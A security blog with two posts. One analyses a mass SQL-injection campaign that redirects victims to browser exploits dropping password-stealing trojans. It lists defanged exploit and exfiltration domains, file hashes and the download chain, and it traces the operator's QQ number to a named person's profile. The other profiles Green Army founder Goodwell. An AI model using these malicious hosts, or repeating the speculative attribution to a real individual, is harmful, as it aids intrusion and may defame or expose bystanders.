The Dark Visitor

Trojan Horse

So the Analyt’s Diary blog at viruslist.com has an article on some new mass SQL injection attack that jacks up .asp pages with redirects to browser exploits. The exploits drop one of two trojans that steal passwords and whatnot. Here is h.js:

document.write(“”);
document.write(“”);

WordPress won’t display the script. Basically, it loads an iframe that points to two separate URLS (these URLs contain browser exploits so don’t follow them):

hxxp://vvexe.com/haha/index.html and
hxxp://www.kenya.com/faq.htm

I can’t seem to get to either of these sites at the moment. I’ll try again later.

Update:  I spent some time looking at this malware.  The two pages listed earlier in this post contain iframes to browser plug-in exploits for real player and other typical vulnerabilities.  The exploits attempt to load and run down.exe (e160f590d894a98474697ac0db987746 not packed/delphi code) which in turn downloads hxxp://www.vvexe.com/haha/down.txt to get the additional files 1.exe (a7fc8c966fdeb550fe19aba3169569be not packed/VC++), do.exe (5af5edaa2cebf1fed56ad36799b2c850 ) and cool.exe (18867d6de1a3a9241c14c22c19b51351 not packed/delphi).

1.exe is a WoW trojan and waits for passwords sent to:

grunt.wowchina.com and [kr|us|tw|eu].[version|logon].worldofwarcraft.com.  It also looks for and attempts to disable many types of security software.  It attempts to send the stolen credentials to an asp on www.yilu777.com.

do.exe is a little more interesting.  It appears to be a generic remote access trojan that sends a beacon to qq number 58836533.  A quick search for that qq number revealed that this person’s paipai account has been frozen:

So I do some more digging and find the QQ profile with a name and nick:

Searching for the nickname got me to a few blogs and profiles that had some young girl who is really into anime. Maybe her QQ account got pwn3d or maybe, just maybe she is a member of “China Girl Security”. I tried to get an add on that QQ account so I could talk to the hacker but didn’t have any luck.

Note to Chinese hackers: Please pay the tax on your WoW gold profits.

Goodwell

The Green Army was founded by a Shanghai hacker going by the online name of Goodwell, it was reported to have had a membership of around 3,000 people from Shanghai, Beijing, and Shijiazhuang. The other four key members of the group went by the pseudonyms Rocky , Dspman (HeHe), Solo, and LittleFish. It also attracted others, considered to be part of China’s first generation hackers, the likes of Xie Zhaoxia, Brother Peng, PP (Peng Quan), Tian Xing (Cheng Weishan), IceWater (Huang Lei), and Little Rong. The group disbanded in 2000 and its rise and fall was described as “confusing” by insiders who consider it one of the enduring symbols of the Chinese hacker movement. The Green Army is said to have hacked “uncountable foreign web sites.” Indeed, many of China’s top hackers were past members of this group.

So, where is he now you ask? Apparently he is spending quite a bit of time playing World of Warcraft and doing a bang up job. In an interview with wow.duoban.com, Goodwell was congratulated for his world record breaking move from level 60 to 70 in under 24 hours. There were some details in the article about how he achieved this feat but it had a bunch of World of Warcraft stuff I don’t understand…but he did it…without hacking…he said. During the interview,which was conducted in September of 2007, he intruduced himself as the founder of the Green Army Hacker Organization Goodwell (Real name Gong Wei).

Screen name: Silver Dragon

Real name: Goodwell (Gong Wei)

Occupation: Hunter

Faction: Tribe

Server: 7th Region? An Geluo

Guild: Green Base

Apparently, there were some problems when his guild (over 2,000 players) was located on the 5th Region server (Unsure of the the translation for servers as regions) for moving up too quickly in ranking. So, they changed their name from the Chinese for Green Army Corps to the English word Greenbase. He Just can’t seem to let go of the old days…and that should scare you WOW players.